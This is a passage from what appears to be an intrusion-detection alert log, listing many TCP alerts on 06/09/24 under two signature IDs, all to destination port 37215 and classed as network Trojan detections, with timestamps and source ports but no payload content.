          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032639
          SID:2829579
          Source Port:58962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478975
          SID:2835222
          Source Port:55222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861017
          SID:2829579
          Source Port:56274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719635
          SID:2829579
          Source Port:59502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925971
          SID:2835222
          Source Port:59326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539412
          SID:2835222
          Source Port:33244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033368
          SID:2835222
          Source Port:54054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085359
          SID:2835222
          Source Port:44626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164901
          SID:2835222
          Source Port:53434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246548
          SID:2835222
          Source Port:37972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891157
          SID:2835222
          Source Port:45458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987120
          SID:2829579
          Source Port:52658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.592855
          SID:2835222
          Source Port:37314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030354
          SID:2829579
          Source Port:56994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818206
          SID:2829579
          Source Port:37552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720271
          SID:2829579
          Source Port:60226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568109
          SID:2829579
          Source Port:35330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274233
          SID:2829579
          Source Port:49862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819251
          SID:2829579
          Source Port:60124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476648
          SID:2829579
          Source Port:54122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475854
          SID:2835222
          Source Port:48894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104389
          SID:2835222
          Source Port:41264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929325
          SID:2829579
          Source Port:46496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.671587
          SID:2835222
          Source Port:35326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601017
          SID:2829579
          Source Port:48150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924393
          SID:2835222
          Source Port:41738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892675
          SID:2829579
          Source Port:45542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.294030
          SID:2829579
          Source Port:51882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010687
          SID:2835222
          Source Port:49898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605613
          SID:2829579
          Source Port:35268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226948
          SID:2835222
          Source Port:49582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168894
          SID:2829579
          Source Port:57652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034345
          SID:2835222
          Source Port:44678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.634945
          SID:2835222
          Source Port:38438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415368
          SID:2835222
          Source Port:33678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034661
          SID:2835222
          Source Port:59260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035374
          SID:2835222
          Source Port:47954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077016
          SID:2829579
          Source Port:49382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397286
          SID:2835222
          Source Port:46200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291749
          SID:2835222
          Source Port:46714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037931
          SID:2829579
          Source Port:52466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603827
          SID:2829579
          Source Port:41412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987024
          SID:2829579
          Source Port:41412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397498
          SID:2829579
          Source Port:47660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.125243
          SID:2829579
          Source Port:39538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227079
          SID:2835222
          Source Port:36330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419451
          SID:2829579
          Source Port:59690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250889
          SID:2835222
          Source Port:51814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130072
          SID:2829579
          Source Port:58124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930315
          SID:2829579
          Source Port:56256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162922
          SID:2835222
          Source Port:36482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169013
          SID:2835222
          Source Port:41712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032919
          SID:2835222
          Source Port:60234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466228
          SID:2835222
          Source Port:60182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418742
          SID:2829579
          Source Port:38310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165072
          SID:2829579
          Source Port:56710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948615
          SID:2835222
          Source Port:36318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247620
          SID:2835222
          Source Port:48450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274521
          SID:2835222
          Source Port:38774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923270
          SID:2835222
          Source Port:35148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289228
          SID:2829579
          Source Port:53526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465597
          SID:2835222
          Source Port:44094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079382
          SID:2835222
          Source Port:43374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719800
          SID:2829579
          Source Port:59564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993687
          SID:2829579
          Source Port:50832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415076
          SID:2829579
          Source Port:42790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945589
          SID:2835222
          Source Port:60670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718845
          SID:2829579
          Source Port:49262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033935
          SID:2829579
          Source Port:49640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037476
          SID:2829579
          Source Port:52034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029307
          SID:2835222
          Source Port:48058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283267
          SID:2835222
          Source Port:45430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286115
          SID:2835222
          Source Port:51152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861957
          SID:2835222
          Source Port:45956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716942
          SID:2835222
          Source Port:57038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103131
          SID:2835222
          Source Port:32820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283810
          SID:2829579
          Source Port:34402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159446
          SID:2829579
          Source Port:37484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081969
          SID:2835222
          Source Port:41608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014205
          SID:2829579
          Source Port:51170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916704
          SID:2835222
          Source Port:52930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818322
          SID:2829579
          Source Port:48380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.740894
          SID:2835222
          Source Port:57222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297981
          SID:2829579
          Source Port:54614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540360
          SID:2829579
          Source Port:55344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868811
          SID:2835222
          Source Port:56492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605598
          SID:2835222
          Source Port:42158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537744
          SID:2835222
          Source Port:33472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595167
          SID:2835222
          Source Port:41938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644274
          SID:2829579
          Source Port:46704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034911
          SID:2829579
          Source Port:37112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030317
          SID:2835222
          Source Port:55824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244295
          SID:2835222
          Source Port:33854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306117
          SID:2829579
          Source Port:40650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275854
          SID:2835222
          Source Port:47322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288964
          SID:2835222
          Source Port:49872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157285
          SID:2835222
          Source Port:44962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540296
          SID:2829579
          Source Port:43426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929687
          SID:2829579
          Source Port:58318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478063
          SID:2835222
          Source Port:50352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910332
          SID:2829579
          Source Port:56380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242362
          SID:2829579
          Source Port:55660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396225
          SID:2835222
          Source Port:60556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247662
          SID:2829579
          Source Port:33882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157378
          SID:2835222
          Source Port:42746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923736
          SID:2835222
          Source Port:54954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719252
          SID:2835222
          Source Port:56286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929887
          SID:2835222
          Source Port:46882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414765
          SID:2829579
          Source Port:51388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400271
          SID:2829579
          Source Port:57092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285479
          SID:2829579
          Source Port:48418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163382
          SID:2835222
          Source Port:49008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818549
          SID:2829579
          Source Port:36374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946133
          SID:2835222
          Source Port:54852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552916
          SID:2835222
          Source Port:53998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300871
          SID:2829579
          Source Port:33446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905293
          SID:2835222
          Source Port:43606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718660
          SID:2835222
          Source Port:44056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163824
          SID:2829579
          Source Port:54808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718266
          SID:2835222
          Source Port:47234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819241
          SID:2829579
          Source Port:34526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987268
          SID:2829579
          Source Port:55156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820102
          SID:2835222
          Source Port:38100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869697
          SID:2829579
          Source Port:50030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000919
          SID:2829579
          Source Port:47552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916958
          SID:2829579
          Source Port:54828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222544
          SID:2835222
          Source Port:57134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682031
          SID:2835222
          Source Port:50962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895923
          SID:2829579
          Source Port:49464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037130
          SID:2835222
          Source Port:35496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243559
          SID:2835222
          Source Port:54154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285456
          SID:2829579
          Source Port:55166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931539
          SID:2835222
          Source Port:51570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644782
          SID:2829579
          Source Port:46580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.717023
          SID:2829579
          Source Port:39222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035552
          SID:2835222
          Source Port:39164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720021
          SID:2835222
          Source Port:37188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721509
          SID:2829579
          Source Port:37504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928785
          SID:2835222
          Source Port:60828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557700
          SID:2835222
          Source Port:51832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644164
          SID:2835222
          Source Port:53400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.646498
          SID:2829579
          Source Port:44552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566377
          SID:2829579
          Source Port:44422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085540
          SID:2829579
          Source Port:54984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035701
          SID:2835222
          Source Port:46108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892545
          SID:2835222
          Source Port:40824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646281
          SID:2835222
          Source Port:60368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033197
          SID:2835222
          Source Port:36370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418752
          SID:2829579
          Source Port:36114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923002
          SID:2829579
          Source Port:57620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867759
          SID:2835222
          Source Port:47940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.696319
          SID:2829579
          Source Port:37186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272293
          SID:2829579
          Source Port:43784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929709
          SID:2835222
          Source Port:55794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081871
          SID:2835222
          Source Port:57344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822437
          SID:2835222
          Source Port:57522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.480706
          SID:2835222
          Source Port:41172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947894
          SID:2835222
          Source Port:52054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947713
          SID:2829579
          Source Port:59922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601976
          SID:2835222
          Source Port:51068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227490
          SID:2835222
          Source Port:41828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713111
          SID:2829579
          Source Port:54620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274800
          SID:2835222
          Source Port:42062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296752
          SID:2829579
          Source Port:57114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.156816
          SID:2835222
          Source Port:33988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468819
          SID:2835222
          Source Port:39302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017384
          SID:2835222
          Source Port:33170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038231
          SID:2835222
          Source Port:35160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169471
          SID:2835222
          Source Port:35244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988854
          SID:2835222
          Source Port:37926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306464
          SID:2829579
          Source Port:50360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594126
          SID:2835222
          Source Port:48794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987820
          SID:2829579
          Source Port:60538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029002
          SID:2835222
          Source Port:35708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034538
          SID:2829579
          Source Port:34672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103567
          SID:2829579
          Source Port:43840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247610
          SID:2829579
          Source Port:44930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944993
          SID:2829579
          Source Port:44182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120766
          SID:2829579
          Source Port:45518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286630
          SID:2835222
          Source Port:46194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225211
          SID:2835222
          Source Port:42182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288946
          SID:2829579
          Source Port:55622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539711
          SID:2835222
          Source Port:59390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038880
          SID:2835222
          Source Port:47224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559127
          SID:2829579
          Source Port:33854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714471
          SID:2835222
          Source Port:59078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253303
          SID:2835222
          Source Port:37782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718265
          SID:2835222
          Source Port:58024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033467
          SID:2835222
          Source Port:38592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919044
          SID:2835222
          Source Port:48010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283085
          SID:2829579
          Source Port:32788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929430
          SID:2835222
          Source Port:46950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165134
          SID:2835222
          Source Port:42586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.647608
          SID:2829579
          Source Port:35320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267347
          SID:2835222
          Source Port:44832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157318
          SID:2835222
          Source Port:39096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914528
          SID:2829579
          Source Port:35906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
